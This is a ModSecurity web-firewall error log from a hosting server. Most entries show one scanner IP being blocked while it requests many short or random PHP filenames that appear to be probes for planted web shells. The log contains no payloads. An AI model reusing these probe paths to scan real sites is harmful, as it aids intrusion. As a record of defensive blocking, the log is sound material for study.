[Tue May 26 14:14:25.121474 2026] [security2:error] [pid 598542:tid 598788] [client 20.151.112.53:4558] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/ll.php"] [unique_id "ahVdaf4iWyZxnXeAW3JB7QAAAHQ"]
[Tue May 26 14:14:25.121619 2026] [security2:error] [pid 598542:tid 598788] [client 20.151.112.53:4558] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/ll.php"] [unique_id "ahVdaf4iWyZxnXeAW3JB7QAAAHQ"]
[Tue May 26 14:14:25.268849 2026] [security2:error] [pid 598542:tid 598735] [client 20.151.112.53:22791] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/sf.php"] [unique_id "ahVdaf4iWyZxnXeAW3JB8gAAAD8"]
[Tue May 26 14:14:25.268993 2026] [security2:error] [pid 598542:tid 598735] [client 20.151.112.53:22791] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/sf.php"] [unique_id "ahVdaf4iWyZxnXeAW3JB8gAAAD8"]
[Tue May 26 14:14:25.436546 2026] [security2:error] [pid 598542:tid 598722] [client 20.151.112.53:34804] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/file5.php"] [unique_id "ahVdaf4iWyZxnXeAW3JB9gAAADI"]
[Tue May 26 14:14:25.436710 2026] [security2:error] [pid 598542:tid 598722] [client 20.151.112.53:34804] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/file5.php"] [unique_id "ahVdaf4iWyZxnXeAW3JB9gAAADI"]
[Tue May 26 14:14:25.588131 2026] [security2:error] [pid 598542:tid 598721] [client 20.151.112.53:4863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/fs.php"] [unique_id "ahVdaf4iWyZxnXeAW3JB-gAAADE"]
[Tue May 26 14:14:25.588254 2026] [security2:error] [pid 598542:tid 598721] [client 20.151.112.53:4863] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/fs.php"] [unique_id "ahVdaf4iWyZxnXeAW3JB-gAAADE"]
[Tue May 26 14:14:25.642994 2026] [security2:error] [pid 598542:tid 598736] [client 123.17.29.139:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdaf4iWyZxnXeAW3JB8QAAAEA"]
[Tue May 26 14:14:25.752865 2026] [security2:error] [pid 598542:tid 598685] [client 20.151.112.53:22820] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/4PJcpMFsD8B.php"] [unique_id "ahVdaf4iWyZxnXeAW3JCAQAAAA0"]
[Tue May 26 14:14:25.752972 2026] [security2:error] [pid 598542:tid 598685] [client 20.151.112.53:22820] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/4PJcpMFsD8B.php"] [unique_id "ahVdaf4iWyZxnXeAW3JCAQAAAA0"]
[Tue May 26 14:14:25.900836 2026] [security2:error] [pid 598542:tid 598797] [client 20.151.112.53:52597] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/file.php"] [unique_id "ahVdaf4iWyZxnXeAW3JCBQAAAH0"]
[Tue May 26 14:14:25.900944 2026] [security2:error] [pid 598542:tid 598797] [client 20.151.112.53:52597] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/file.php"] [unique_id "ahVdaf4iWyZxnXeAW3JCBQAAAH0"]
[Tue May 26 14:14:26.047773 2026] [security2:error] [pid 598542:tid 598677] [client 20.151.112.53:22234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cfile.php"] [unique_id "ahVdav4iWyZxnXeAW3JCCQAAAAU"]
[Tue May 26 14:14:26.047873 2026] [security2:error] [pid 598542:tid 598677] [client 20.151.112.53:22234] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cfile.php"] [unique_id "ahVdav4iWyZxnXeAW3JCCQAAAAU"]
[Tue May 26 14:14:26.283089 2026] [security2:error] [pid 598542:tid 598754] [client 20.151.112.53:4849] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/class-wp.php"] [unique_id "ahVdav4iWyZxnXeAW3JCEAAAAFI"]
[Tue May 26 14:14:26.283228 2026] [security2:error] [pid 598542:tid 598754] [client 20.151.112.53:4849] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/class-wp.php"] [unique_id "ahVdav4iWyZxnXeAW3JCEAAAAFI"]
[Tue May 26 14:14:26.434325 2026] [security2:error] [pid 598542:tid 598728] [client 20.151.112.53:22788] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/ahax.php"] [unique_id "ahVdav4iWyZxnXeAW3JCFwAAADg"]
[Tue May 26 14:14:26.434490 2026] [security2:error] [pid 598542:tid 598728] [client 20.151.112.53:22788] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/ahax.php"] [unique_id "ahVdav4iWyZxnXeAW3JCFwAAADg"]
[Tue May 26 14:14:26.516238 2026] [security2:error] [pid 598542:tid 598678] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdav4iWyZxnXeAW3JCDAAAAAY"]
[Tue May 26 14:14:26.577658 2026] [security2:error] [pid 598542:tid 598686] [client 20.151.112.53:31224] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/aa2.php"] [unique_id "ahVdav4iWyZxnXeAW3JCGAAAAA4"]
[Tue May 26 14:14:26.577772 2026] [security2:error] [pid 598542:tid 598686] [client 20.151.112.53:31224] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/aa2.php"] [unique_id "ahVdav4iWyZxnXeAW3JCGAAAAA4"]
[Tue May 26 14:14:26.729518 2026] [security2:error] [pid 598542:tid 598696] [client 20.151.112.53:22191] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/ccou.php"] [unique_id "ahVdav4iWyZxnXeAW3JCKAAAABg"]
[Tue May 26 14:14:26.729610 2026] [security2:error] [pid 598542:tid 598696] [client 20.151.112.53:22191] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/ccou.php"] [unique_id "ahVdav4iWyZxnXeAW3JCKAAAABg"]
[Tue May 26 14:14:26.879509 2026] [security2:error] [pid 598542:tid 598762] [client 20.151.112.53:4588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/login8.php"] [unique_id "ahVdav4iWyZxnXeAW3JCKQAAAFo"]
[Tue May 26 14:14:26.879669 2026] [security2:error] [pid 598542:tid 598762] [client 20.151.112.53:4588] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/login8.php"] [unique_id "ahVdav4iWyZxnXeAW3JCKQAAAFo"]
[Tue May 26 14:14:26.999537 2026] [security2:error] [pid 598542:tid 598554] [remote 47.128.47.134:31730] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/budgetary-transparency/"] [unique_id "ahVdav4iWyZxnXeAW3JCKgAACgs"]
[Tue May 26 14:14:27.044976 2026] [security2:error] [pid 598542:tid 598719] [client 20.151.112.53:52560] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/nx.php"] [unique_id "ahVda_4iWyZxnXeAW3JCLgAAAC8"]
[Tue May 26 14:14:27.045060 2026] [security2:error] [pid 598542:tid 598719] [client 20.151.112.53:52560] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/nx.php"] [unique_id "ahVda_4iWyZxnXeAW3JCLgAAAC8"]
[Tue May 26 14:14:27.265511 2026] [security2:error] [pid 598542:tid 598680] [client 20.151.112.53:39501] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/dr.php"] [unique_id "ahVda_4iWyZxnXeAW3JCPwAAAAg"]
[Tue May 26 14:14:27.265612 2026] [security2:error] [pid 598542:tid 598680] [client 20.151.112.53:39501] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/dr.php"] [unique_id "ahVda_4iWyZxnXeAW3JCPwAAAAg"]
[Tue May 26 14:14:27.413261 2026] [security2:error] [pid 598542:tid 598700] [client 20.151.112.53:39516] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/xamp.php"] [unique_id "ahVda_4iWyZxnXeAW3JCQQAAABw"]
[Tue May 26 14:14:27.413390 2026] [security2:error] [pid 598542:tid 598700] [client 20.151.112.53:39516] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/xamp.php"] [unique_id "ahVda_4iWyZxnXeAW3JCQQAAABw"]
[Tue May 26 14:14:27.788759 2026] [security2:error] [pid 598542:tid 598741] [client 20.151.112.53:4835] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cA3bHIkVhgP.php"] [unique_id "ahVda_4iWyZxnXeAW3JCSwAAAEU"]
[Tue May 26 14:14:27.788846 2026] [security2:error] [pid 598542:tid 598741] [client 20.151.112.53:4835] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cA3bHIkVhgP.php"] [unique_id "ahVda_4iWyZxnXeAW3JCSwAAAEU"]
[Tue May 26 14:14:27.965197 2026] [security2:error] [pid 598542:tid 598765] [client 20.151.112.53:22200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/clas11.php"] [unique_id "ahVda_4iWyZxnXeAW3JCVQAAAF0"]
[Tue May 26 14:14:27.965343 2026] [security2:error] [pid 598542:tid 598765] [client 20.151.112.53:22200] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/clas11.php"] [unique_id "ahVda_4iWyZxnXeAW3JCVQAAAF0"]
[Tue May 26 14:14:28.114490 2026] [security2:error] [pid 598542:tid 598788] [client 20.151.112.53:31209] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cxl.php"] [unique_id "ahVdbP4iWyZxnXeAW3JCYAAAAHQ"]
[Tue May 26 14:14:28.114569 2026] [security2:error] [pid 598542:tid 598788] [client 20.151.112.53:31209] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cxl.php"] [unique_id "ahVdbP4iWyZxnXeAW3JCYAAAAHQ"]
[Tue May 26 14:14:28.292024 2026] [security2:error] [pid 598542:tid 598751] [client 20.151.112.53:52504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/bb.php"] [unique_id "ahVdbP4iWyZxnXeAW3JCZQAAAE8"]
[Tue May 26 14:14:28.292122 2026] [security2:error] [pid 598542:tid 598751] [client 20.151.112.53:52504] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/bb.php"] [unique_id "ahVdbP4iWyZxnXeAW3JCZQAAAE8"]
[Tue May 26 14:14:28.436103 2026] [security2:error] [pid 598542:tid 598732] [client 20.151.112.53:22215] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/dtox.php"] [unique_id "ahVdbP4iWyZxnXeAW3JCaQAAADw"]
[Tue May 26 14:14:28.436227 2026] [security2:error] [pid 598542:tid 598732] [client 20.151.112.53:22215] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/dtox.php"] [unique_id "ahVdbP4iWyZxnXeAW3JCaQAAADw"]
[Tue May 26 14:14:28.584600 2026] [security2:error] [pid 598542:tid 598743] [client 20.151.112.53:25435] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/eee.php"] [unique_id "ahVdbP4iWyZxnXeAW3JCdQAAAEc"]
[Tue May 26 14:14:28.584730 2026] [security2:error] [pid 598542:tid 598743] [client 20.151.112.53:25435] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/eee.php"] [unique_id "ahVdbP4iWyZxnXeAW3JCdQAAAEc"]
[Tue May 26 14:14:28.743548 2026] [security2:error] [pid 598542:tid 598692] [client 20.151.112.53:25436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/5BltUjE9CrY.php"] [unique_id "ahVdbP4iWyZxnXeAW3JCegAAABQ"]
[Tue May 26 14:14:28.743656 2026] [security2:error] [pid 598542:tid 598692] [client 20.151.112.53:25436] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/5BltUjE9CrY.php"] [unique_id "ahVdbP4iWyZxnXeAW3JCegAAABQ"]
[Tue May 26 14:14:28.753433 2026] [security2:error] [pid 598542:tid 598684] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdbP4iWyZxnXeAW3JCaAAAAAw"]
[Tue May 26 14:14:28.941657 2026] [security2:error] [pid 598542:tid 598760] [client 20.151.112.53:39510] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/come.php"] [unique_id "ahVdbP4iWyZxnXeAW3JCgAAAAFg"]
[Tue May 26 14:14:28.941761 2026] [security2:error] [pid 598542:tid 598760] [client 20.151.112.53:39510] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/come.php"] [unique_id "ahVdbP4iWyZxnXeAW3JCgAAAAFg"]
[Tue May 26 14:14:29.107227 2026] [security2:error] [pid 598542:tid 598705] [client 20.151.112.53:4561] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/hg.php"] [unique_id "ahVdbf4iWyZxnXeAW3JCggAAACE"]
[Tue May 26 14:14:29.107341 2026] [security2:error] [pid 598542:tid 598705] [client 20.151.112.53:4561] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/hg.php"] [unique_id "ahVdbf4iWyZxnXeAW3JCggAAACE"]
[Tue May 26 14:14:29.252069 2026] [security2:error] [pid 598542:tid 598799] [client 20.151.112.53:42713] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/aaa.php"] [unique_id "ahVdbf4iWyZxnXeAW3JCiAAAAH8"]
[Tue May 26 14:14:29.252158 2026] [security2:error] [pid 598542:tid 598799] [client 20.151.112.53:42713] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/aaa.php"] [unique_id "ahVdbf4iWyZxnXeAW3JCiAAAAH8"]
[Tue May 26 14:14:29.396596 2026] [security2:error] [pid 598542:tid 598687] [client 20.151.112.53:35412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/at.php"] [unique_id "ahVdbf4iWyZxnXeAW3JCkAAAAA8"]
[Tue May 26 14:14:29.396713 2026] [security2:error] [pid 598542:tid 598687] [client 20.151.112.53:35412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/at.php"] [unique_id "ahVdbf4iWyZxnXeAW3JCkAAAAA8"]
[Tue May 26 14:14:29.540005 2026] [security2:error] [pid 598542:tid 598779] [client 20.151.112.53:35404] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/ff.php"] [unique_id "ahVdbf4iWyZxnXeAW3JClAAAAGs"]
[Tue May 26 14:14:29.540110 2026] [security2:error] [pid 598542:tid 598779] [client 20.151.112.53:35404] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/ff.php"] [unique_id "ahVdbf4iWyZxnXeAW3JClAAAAGs"]
[Tue May 26 14:14:29.695986 2026] [security2:error] [pid 598542:tid 598792] [client 20.151.112.53:25457] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/file31.php"] [unique_id "ahVdbf4iWyZxnXeAW3JCmAAAAHg"]
[Tue May 26 14:14:29.696080 2026] [security2:error] [pid 598542:tid 598792] [client 20.151.112.53:25457] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/file31.php"] [unique_id "ahVdbf4iWyZxnXeAW3JCmAAAAHg"]
